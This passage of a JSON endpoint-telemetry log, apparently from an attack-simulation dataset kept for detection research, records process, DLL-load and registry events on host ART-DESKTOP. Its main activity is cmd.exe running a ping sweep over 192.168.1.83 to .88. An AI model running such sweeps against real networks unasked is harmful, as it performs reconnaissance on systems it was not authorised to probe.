"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572376990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6016, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572376990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6016, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572376990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6016, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572376990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6016, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572376990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6016, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572376990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6016, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572376990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6016, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572376990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" - }, - { - "event_type": "process", - "pid": 6016, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572381990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.83", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3912, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572382190000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572382140000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572382140000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572382140000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572382140000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572382140000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572382140000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572382140000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572382140000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572382140000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572382140000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572382300000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" - }, - { - "event_type": "process", - "pid": 3912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572386830000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.84", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6280, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572387029984, - "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6280, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572386980000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6280, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572386980000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6280, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572386980000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6280, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572386980000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6280, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572386980000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6280, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572386980000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6280, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572386980000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6280, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572386980000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6280, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572386980000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6280, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572386980000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6280, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572386980000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" - }, - { - "event_type": "process", - "pid": 6280, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572391990000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.85", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2900, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572392150000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2900, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572392140000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2900, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572392140000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2900, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572392140000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2900, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572392140000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2900, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572392140000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2900, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572392140000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2900, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572392140000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2900, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572392140000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2900, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572392140000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2900, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572392140000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2900, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572392140000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883572396050000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - "timestamp": 131883572396200016, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883572396200016, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", - "registry_value": "Input", - "timestamp": 131883572396200016, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "process", - "pid": 2900, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572396830000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.86", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4696, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572397060000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572396980000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572396980000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572396980000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572396980000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572396980000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572396980000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572396980000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572396980000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572397140000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572397140000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572397140000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" - }, - { - "event_type": "registry", - "pid": 2712, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", - "registry_value": "VFUProvider", - "timestamp": 131883572400270000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" - }, - { - "event_type": "registry", - "pid": 2712, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider\\StartTime", - "registry_value": "StartTime", - "timestamp": 131883572400270000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" - }, - { - "event_type": "process", - "pid": 4696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572401830000, - "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.87", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7372, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572401980000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7372, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572401990000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7372, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572401990000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7372, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572401990000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7372, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572401990000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7372, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572401990000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7372, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572402140000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7372, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572402140000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7372, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572402140000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7372, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572402140000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7372, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572402140000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7372, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572402140000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" - }, - { - "event_type": "process", - "pid": 7372, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572406830000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.88", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6788, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572406980000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572406980000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572406980000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572406980000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572406980000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572406980000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572406980000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572406980000, - "unique_pid": 